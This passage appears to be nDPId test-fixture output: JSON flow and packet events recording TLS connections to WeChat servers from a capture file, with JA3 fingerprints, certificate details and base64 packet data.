3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} +00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378674,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378674,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378674,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8mSRAAEAGfBjAqAFny82XotNOAbtKc0omAAAAAKACchBzmgAAAgQFtAQCCAoAMNMCAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167378926,"flow_last_seen":1492167378926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167378926,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 